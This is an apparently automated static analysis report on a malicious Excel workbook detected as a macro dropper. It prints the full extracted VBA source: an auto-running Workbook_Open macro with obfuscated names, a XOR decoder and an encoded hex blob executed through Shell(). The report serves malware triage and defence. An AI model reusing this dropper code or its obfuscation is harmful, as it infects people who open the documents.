Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2b12263def10a536…

MALICIOUS

Office (OOXML)

153.1 KB Created: 2020-03-13 07:29:42 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-07-24
MD5: 85020b784ec6a9178b2a6225bf560fcb SHA-1: c0b0a4c20c7f7fb583fc264e7a20ade1c456f901 SHA-256: 2b12263def10a536452804ecc8c987749009a9ba09cd48477907842e5b3626da
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro. This macro uses the Shell() function to execute a command, which is a common technique for downloading and executing a second-stage payload. ClamAV detection further confirms its malicious nature, identifying it as Xls.Dropper.Agent-7618562-0. The obfuscated VBA code suggests an attempt to evade detection.

Heuristics 6

  • ClamAV: Xls.Dropper.Agent-7618562-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7618562-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3128 bytes
SHA-256: 594fadb5cfc3837ecbe3043ace70e6d2d18e271ba426229fead2fbc7ee05dbe3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim ¥³±°§™Õ¹ä±­•œ•à±îyȧ·î½™§¹ì•yŧ¾½¥œÕ¾é¾à¹†Å±™îÌ•Z¥œ¹½˜ As String
Dim …Y³Ã¼•¬¹§B•¾˜o¾i±Â™½G¾N™ìº¾•·ÂøD×Y¶éà–yŬ™±¹½¾…´N¤…ñyŸä As String
Dim ¹¤Ÿ•Z†à–‚™â™y¾œÃ½à·‘½¨DD¹•™•×¹G•¾ÌÕ¾´YŸ¥•³yŸm±È䶽…§Z¹œ As String
Dim ৕ö½‚y½™´OÌ…·Ç·‚½ª•»¥È±•€••§•XÕ´D…™†±O™½Ÿ…ºD¾ÌZ»¨…• As String
Dim cc As String
Dim ±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•Ç§îñ³°•à†ìØŸ•¶ÇÌ As String
±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•Ç§îñ³°•à†ìØŸ•¶ÇÌ = (±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•Ç§îñ³°•à†ìØŸ•¶ÇÌ + (Replace(a(a("g", "262626" + …Y³Ã¼•¬¹§B•¾˜o¾i±Â™½G¾N™ìº¾•·ÂøD×Y¶éà–yŬ™±¹½¾…´N¤…ñyŸä), "222C25616E2261312E61070706060707060661362433610707060607070606613229242D2D6F243924616C24392422346107070606070706066135282E2F312E2D2822386123383120323261610707060607070606616C166109282525242F616C222E610707060607070606612C2C202F2561692F24366C2E232B2422356112383235242C6F0F24356F162423022D28242F35686F052E362F2D2E202507282D246966293535317B6E6E312E323028356F2F24356E786E77737172786F243924666D65242F377B15242C316A661D2F2461070706060707060661362728610707060607070606612D246F04392466687A690F24366C0E232B242235616C22610707060607070606612E2C611229242D2D6F610707060607070606610031312D28222035282E2F686F1229242D2D043924223435246965242F377B1524610707060607070606612C316A661D2F24362761070706060707060661282D246F0439246668"), " FFGGFFGG " + cc, "")))
Shell (±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•Ç§îñ³°•à†ìØŸ•¶ÇÌ)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 15872 bytes
SHA-256: 43fd9317e5c1b0cb7213246f49914b9f08f2e43ff78615a9712d5869e2f5000f
Detection
ClamAV: Xls.Dropper.Agent-7618562-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.